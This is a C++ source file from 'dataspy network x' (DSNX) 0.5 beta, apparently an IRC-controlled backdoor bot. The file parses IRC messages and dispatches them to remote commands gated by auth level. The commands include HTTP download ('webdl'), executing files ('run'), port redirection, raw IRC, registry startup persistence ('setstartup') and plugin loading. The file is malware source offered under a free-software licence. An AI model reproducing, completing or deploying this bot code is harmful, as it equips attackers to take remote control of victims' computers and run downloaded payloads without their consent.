
#include <windows.h>
#include <stdio.h>
#include "../include/commands.h"
#include "../include/staticcommands.h"
 /*	
	dataspy network x version 0.5 beta
	Copyright (C) 2002 dataspy dot net INC

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
  */

 /*

	Commands.cpp - Parses user input and calls the command. Also adds static commands.

	Last revised : 31st March 2002

  */


#include "../include/auth.h"

CLinkedList *g_CommandList = 0;

DSNXCommand::DSNXCommand (char *command_id,USHORT required_lvl,DSNX_Command command) :CLinkedList(command_id) {

	this->command = command;
	this->req_lvl = required_lvl;
	

}

DSNXCommand::~DSNXCommand() {



}

void AddCommandToList (char *name,DSNX_Command command,short auth_lvl) {

	DSNXCommand *list = new DSNXCommand(name,auth_lvl,command);
	list->Insert(&g_CommandList);

}

void AddStaticCommands(void) {

	AddCommandToList("decrypt",		Cmd_DecryptCmd,		NO_AUTH);			/* Decrypt encrypted text */
	AddCommandToList("login",		Cmd_Login,			NO_AUTH);			/* login user */
	AddCommandToList("encrypt",		Cmd_EncryptCmd,		LGD_IN_AUTH_LVL);	/* Decrypt encrypted text */
	AddCommandToList("info",		Cmd_Info,			LGD_IN_AUTH_LVL);	/* Info */
	AddCommandToList("logout",		Cmd_Logout,			LGD_IN_AUTH_LVL);	/* Logout */
	AddCommandToList("mainbot",		Cmd_MainBot,		LGD_IN_AUTH_LVL);	/* Create Mainbot */
	AddCommandToList("nick",		Cmd_NewIRCNick,		LGD_IN_AUTH_LVL);	/* New IRC Nick */
	AddCommandToList("plugins",		Cmd_AddPlugins,		LGD_IN_AUTH_LVL);	/* Add plugin */
	AddCommandToList("quit",		Cmd_Quit,			LGD_IN_AUTH_LVL);	/* Quit command */
	AddCommandToList("raw",			Cmd_RawIRC,			LGD_IN_AUTH_LVL);	/* Raw IRC */
	AddCommandToList("slist",		Cmd_ServerLists,	LGD_IN_AUTH_LVL);	/* Access Server Lists */
	AddCommandToList("webdl",		Cmd_HttpDownload,	LGD_IN_AUTH_LVL);	/* Download file from HTTP Server */
	AddCommandToList("run",			Cmd_Run,			LGD_IN_AUTH_LVL);	/* runs a file */
	AddCommandToList("alias",		Cmd_Alias,			LGD_IN_AUTH_LVL);	/* Our alias stuff */
	AddCommandToList("portr",		Cmd_PortRedirect,	LGD_IN_AUTH_LVL);	/* Portredirect */
	AddCommandToList("visit",		Cmd_Visit,			LGD_IN_AUTH_LVL);	/* login user */
	AddCommandToList("md5",			Cmd_PrintMD5,		LGD_IN_AUTH_LVL);	/* Calc MD5 Digest */
	AddCommandToList("setstartup",	Cmd_UpdateSettings,	MAX_AUTH_LVL);		/* Update settings in the registry */
	AddCommandToList("uninstall",	Cmd_RemoveFromReg,	MAX_AUTH_LVL);		/* Remove our reg startup key */
	AddCommandToList("mult",		Cmd_MultiCmd,		MAX_AUTH_LVL);		/* Multirun */
	AddCommandToList("set",			Cmd_SetSetting,		MAX_AUTH_LVL);		/* Set setting */
	
}

/* maximum number of spaces we will split */

char *UnescapeString(char *str) {

	char *r,*w;

/* Escape sequences=  \' \" \? \\ \a \b \f \n \r \t \v */

	w=r = str;

	while (*str) {

		if (*(str++) == '\\') {

			switch (*str) {

			case ('\''):
				*(w++) = '\'';
				break;
			case ('\"'):
				*(w++) = '\"';
				break;
			case ('\?'):
				*(w++) = '\?';
				break;
			case ('\\'):
				*(w++) = '\\';
				break;
			case ('a'):
				*(w++) = '\a';
				break;
			case ('b'):
				*(w++) = '\b';
				break;
			case ('f'):
				*(w++) = '\f';
				break;
			case ('n'):
				*(w++) = '\n';
				break;
			case ('r'):
				*(w++) = '\r';
				break;
			case ('t'):
				*(w++) = '\t';
				break;
			case ('v'):
				*(w++) = '\v';
				break;
			default:
				*(w++) = *str;
			}

			str++;

		} else
			*w++ = *(str-1);
	}

	*w =0;
	return r;

}



BOOL CleanAndRun(char *msg,char *from,char *mask,char *where,MainBot *bot,unsigned short auth_lvl)
{
	BOOL bResult= FALSE;
	char cReply[2048];
	char **args = NULL;
	long argc	= 1;		/* even if there are no spaces, there could be at least one argument */

	char *s,*q,*t,*original = msg;
	USHORT inc=0;

	memset(cReply,0,sizeof(cReply));

	while ( *msg) {
		if ( *msg == ' ' || *msg == '\"' ) {
			argc++;
		}

		msg++;
	}

	msg = original;

	args = (char**)malloc(sizeof(char*) * argc);

	if (!args)
		return FALSE;

	while ((t = msg)) {

		while ( *t == ' ' ) { /* remove previous spaces */
			*(t++) = 0;
		}

		s = strchr( t , ' ' );
		q = strchr( t, '\"' );

		if (q) {
				while (*(q-1) == '\\') {

					q = strchr(q+1,'"');

					if (!q)
						break;

				}
			}
		if (q && ( s > q || !s )) {

			if (q != t) {
				args[inc++] = t;
			}

			*q=0;
			args[inc++] =s= q+1;


			q = strchr( s , '\"' );

			if (q) {
				while (*(q-1) == '\\') {

					q = strchr(q+1,'"');

					if (!q)
						break;
				}
			}

			if (!q) {
				s=NULL;
				break;
			} //else

			*q =0;
			msg = q + 1;

			continue;

		}

		if (*t)
			args[inc++] = t;
		msg = s;
	}

	sprintf(cReply,"Error or syntax incorrect");

	argc = inc;

	while (argc-- > 0)
		UnescapeString(args[argc]);


	if (g_CommandList != 0) {

		CLinkedList *command = g_CommandList->Get(*args);

 		if (command != 0) {

			if (auth_lvl >= ((DSNXCommand*)(command))->req_lvl) {

				bResult = ((DSNXCommand*)(command))->command(cReply,from,mask,where,bot,inc-1,args,auth_lvl);

			} else  if (((DSNXCommand*)(command))->req_lvl <= MAX_AUTH_LVL) {

				sprintf(cReply,"access denied (you==%d|required>=%d)",auth_lvl,((DSNXCommand*)(command))->req_lvl);
			}
		}

	}

	if (bot != 0 && *cReply && auth_lvl > NO_AUTH)

		bot->SendIRCMessage(cReply,from,where,!bResult);

	free (args);

	return bResult;
}

